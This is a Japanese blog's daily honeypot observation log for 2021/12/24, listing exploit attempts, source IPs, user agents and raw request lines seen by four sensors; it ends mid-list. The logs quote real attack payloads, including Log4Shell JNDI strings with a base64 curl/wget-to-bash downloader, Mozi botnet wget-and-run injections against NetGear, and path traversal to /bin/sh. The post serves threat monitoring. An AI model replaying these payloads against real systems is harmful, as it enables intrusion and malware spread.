コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/12/24 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/12/24分です。

特徴
共通

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

/.gitへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

アクセス数推移

JP:総アクセス数:128 (前日比:15)
US:総アクセス数:83 (前日比:23)
UK:総アクセス数:47 (前日比:-111)
SG:総アクセス数:107 (前日比:-200)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.56.57.56 Netherlands
1 2.57.122.62 Romania
1 5.188.210.227 Russia
2 20.106.243.122 United States
33 40.65.99.132 United States
1 45.61.187.215 United States
1 45.61.188.40 United States
5 51.107.183.237 United Kingdom
1 52.23.146.157 United States
1 64.227.34.28 United States
1 64.227.98.253 United States
3 89.248.165.52 United Kingdom
19 89.248.173.140 United Kingdom
8 100.26.250.76 United States
1 125.44.12.142 China
4 128.14.141.34 United States
2 128.14.209.170 United States
12 135.125.217.54 France
1 138.68.182.132 United States
1 143.244.189.0 United States
1 144.126.209.23 United States
1 147.182.195.163 United States
7 157.245.80.223 United States
1 159.223.152.187 United States
1 159.223.161.253 United States
1 159.223.169.3 United States
1 159.223.169.7 United States
1 163.125.211.207 China
1 165.232.142.210 United States
1 182.56.44.220 India
2 185.254.196.217 Ukraine
5 185.254.196.218 Ukraine
1 192.241.211.49 United States
1 205.185.124.253 United States
1 209.17.96.82 United States
1 209.141.35.110 United States
1 209.141.59.190 United States
1 212.192.216.78 Czechia

UserAgent一覧

件数 UserAgent
34 -
1 Hello, World
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH; MPLUS)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
38 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x16\x03\x01\x01\xfa\x01
1 \x16\x03\x01
1 \x16\x03
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
1 GET /%20-%20.env HTTP/1.1
1 GET /%20.env HTTP/1.1
1 GET /-%20Copy.env HTTP/1.1
39 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?x=${jndi:ldap://89[.]248[.]173[.]139:443/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430343a32313a31372e3431333232303234385a227d030418a267ecaf32bc534ab150dada91} HTTP/1.1\n
1 GET /?x=${jndi:ldap://89[.]248[.]173[.]140:443/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a35313a30332e3330323236373031315a227d570790a0ad35e96e22fb0efd99c4c061} HTTP/1.0\n
1 GET /?x=${jndi:ldap://89[.]248[.]173[.]145:80/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430343a32373a30352e3731363233353635365a227d54621bfb84881462bb8a704579a0ab6e} HTTP/1.1\n
1 GET /?x=${jndi:ldap://89[.]248[.]173[.]145:80/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430343a32373a32322e3737373030393830395a227d0693d76723c71dad7bfacc7f31fa731e} HTTP/1.1\n
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
2 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /conf/.env HTTP/1.1
1 GET /copy.env HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js?32265 HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /fuel HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /template/desktop/js/vlxx.js?v=2 HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /wp-content/themes/wp-porn/style.css HTTP/1.1
1 GET /wp-content/uploads/2021/12/Gai-toc-xu-lon-to-dam-dang-nhung-cuoc-hoang-dam-khong-diem-dung-320x225.png HTTP/1.1
1 GET /www/.env HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD /?x=${jndi:ldap://89[.]248[.]173[.]140:443/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a35303a33302e3638393531333634345a227dddef40e798d5900ac82c4cfd7d11cf01} HTTP/1.1\n
1 HEAD / HTTP/1.0
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POSR /?x=${jndi:ldap://89[.]248[.]173[.]140:443/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a34353a31312e3135393339383936365a227d006a38520dba16f070a7326a28621bb0} HTTP/1.1\n
1 POSR /?x=${jndi:ldap://89[.]248[.]173[.]140:45432/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a34343a34362e35343130363237365a227d2a99628b3ca3ed04d0a64508ee6c1eab} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:1389/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430353a33363a34372e3630353533303637385a227d5e887b9d5ee31ee2869fc10286b7c160} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:1389/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430353a34313a33322e3735363931323633365a227d7176e1218b0710408850121be10566aa} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:80/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430353a33363a31342e3037363136343636345a227d0e9bd0349d5d5a736b4da6217e27bf04} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:80/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430353a33373a31302e3332343431343630365a227da2f8981f2d9b48e6f90a582793691c4e} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:80/7b22536f7572636555726c223a227463703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430393a31313a31392e3239303438303232315a227d3f0704dcee70dbfbbf2d05d2f4eafe1c} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:80/7b22536f7572636555726c223a227463703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430393a31333a33312e3631363832393835335a227dd7eb5e0955429b246a96e78b821a12e1} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:80/7b22536f7572636555726c223a227463703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430393a31373a35302e3433383039363639375a227d80022306d0c78dfb4bd81f6ef9a63419} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:8080/7b22536f7572636555726c223a227463703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335431303a34373a31392e3533333630303137355a227d30586fa2519e0447536a5231ceb6f388} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]139:8080/7b22536f7572636555726c223a227463703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335431303a35333a31322e3634363338333232365a227dfdfe471d4ad72b83a63c67a7bf3a8165} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]140:45432/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a33373a33322e3936393131333531335a227d1ceba3f03f24b8313d05cf44a5ce9890} HTTP/1.1\n
1 POST /?x=${jndi:ldap://89[.]248[.]173[.]140:993/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430353a33313a33332e3432353431393733385a227dc6e446b16fbe3081cdf66adbc94b3c62} HTTP/1.1\n
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 PUT /?x=${jndi:ldap://89[.]248[.]173[.]140:45432/7b22536f7572636555726c223a22687474703a2f2f31382e3137392e32302e353a3830222c225061796c6f6164536f75726365223a22687474702d782d75726c222c22497373756544617465223a22323032312d31322d32335430333a34343a32332e3532313538373935375a227d6d8d6bc9dd17894441996da498351a44} HTTP/1.1\n
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.56.57.56 Netherlands
2 20.85.245.79 United States
2 23.146.240.233 United States
1 23.251.102.82 United States
1 45.61.187.128 United States
8 47.252.25.151 United States
6 51.79.29.48 Canada
1 51.158.156.78 France
1 64.227.98.253 United States
6 89.248.165.52 United Kingdom
2 94.232.43.63 Russia
1 101.35.83.242 China
1 107.189.2.243 United States
1 109.237.103.123 Russia
1 112.94.96.142 China
1 123.16.129.169 Vietnam
8 137.184.221.114 United States
1 143.244.189.0 United States
2 144.126.209.23 United States
2 147.182.195.163 United States
2 157.245.70.127 United States
1 157.245.71.116 United States
1 159.223.152.187 United States
1 159.223.169.7 United States
1 182.127.203.115 China
1 192.241.212.158 United States
4 193.118.53.210 United States
9 195.54.160.149 Russia
1 197.184.178.186 South Africa
1 198.98.49.124 United States
1 199.195.254.63 United States
1 205.185.117.154 United States
1 205.185.119.112 United States
7 206.81.28.137 United States
1 209.17.96.114 United States
1 212.192.216.78 Czechia

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}
18 -
1 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible;)
1 Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/51.0.2704.104 Mobile/13F69 Safari/601.1.46
1 Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/55.0.2883.79 Mobile/14C92 Safari/602.1
1 Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/11.1.66360 Mobile/13C75 Safari/600.1.4
2 Mozilla/5.0 zgrab/0.x
1 Roku/DVP-9.10 (289.10E04111A)
2 curl/7.75.0

リクエスト内容一覧

件数 Method Request Protocol
4 -
2 \x03
1 \x16\x03\x01\x01\xfb\x01
2 \x16\x03\x01\x02
1 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
1 GET /$%7Bjndi:ldap://121[.]140[.]99[.]236:1389/Exploit%7D HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo} HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /clover/gui/login.jsf HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js?97558 HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]16[.]129[.]169:58925/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /template/desktop/js/vlxx.js?v=2 HTTP/1.1
1 GET /text4041640252198 HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/themes/wp-porn/style.css HTTP/1.1
1 GET /wp-content/uploads/2021/12/Gai-toc-xu-lon-to-dam-dang-nhung-cuoc-hoang-dam-khong-diem-dung-320x225.png HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /sdk HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.82.197.93 China
1 23.90.160.114 United States
1 23.101.185.44 United States
1 45.61.187.251 United States
1 45.61.188.222 United States
1 51.158.156.78 France
1 61.242.54.161 China
6 89.248.165.52 United Kingdom
1 109.237.103.123 Russia
1 112.235.230.119 China
4 128.1.248.26 United States
1 132.145.39.16 United States
1 143.198.156.242 United States
1 183.136.225.9 China
1 185.162.235.164 Russia
1 192.241.211.150 United States
9 195.54.160.149 Russia
1 198.98.49.124 United States
1 199.117.154.162 United States
1 205.185.120.201 United States
7 206.189.58.41 United States
1 209.17.96.122 United States
1 209.141.53.105 United States
1 209.141.54.111 United States
1 212.192.216.78 Czechia

UserAgent一覧

件数 UserAgent
1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}
11 -
1 Hello, World
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
1 Mozilla/5.0 (Linux; Android 8.0.0; ANE-LX3 Build/HUAWEIANE-LX3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/69.0.3497.100 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/192.0.0.34.85;]
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
1 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 \x16\x03\x01\x01\xfc\x01
1 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=} HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /api/productConfig HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /clover/gui/login.jsf HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js?26743 HTTP/1.1
1 GET /fbd/js/app.f2dc9c23.js HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /template/desktop/js/vlxx.js?v=2 HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/themes/wp-porn/style.css HTTP/1.1
1 GET /wp-content/uploads/2021/12/Gai-toc-xu-lon-to-dam-dang-nhung-cuoc-hoang-dam-khong-diem-dung-320x225.png HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.17.224.131 United States
2 20.85.245.79 United States
1 23.105.110.215 United States
1 27.47.42.145 China
33 40.65.99.132 United States
1 45.61.185.166 United States
1 45.61.187.128 United States
1 45.61.187.180 United States
1 45.61.187.251 United States
6 51.79.29.48 Canada
1 61.95.220.205 India
6 89.248.165.52 United Kingdom
2 94.232.43.63 Russia
5 103.131.164.42 South Korea
5 103.230.14.92 Hong Kong
5 115.144.166.80 South Korea
1 128.14.209.170 United States
1 143.198.55.184 United States
1 144.126.209.23 United States
1 147.182.195.163 United States
1 149.129.50.37 Singapore
1 159.65.30.8 United States
1 159.223.152.187 United States
1 159.223.161.253 United States
1 159.223.161.254 United States
3 163.172.159.134 United Kingdom
5 185.254.196.223 Ukraine
1 192.241.214.54 United States
4 193.118.53.210 United States
8 195.54.160.149 Russia
1 198.98.49.124 United States
1 209.17.96.10 United States
1 209.141.53.105 United States
1 212.192.216.78 Czechia
1 223.149.240.41 China

UserAgent一覧

件数 UserAgent
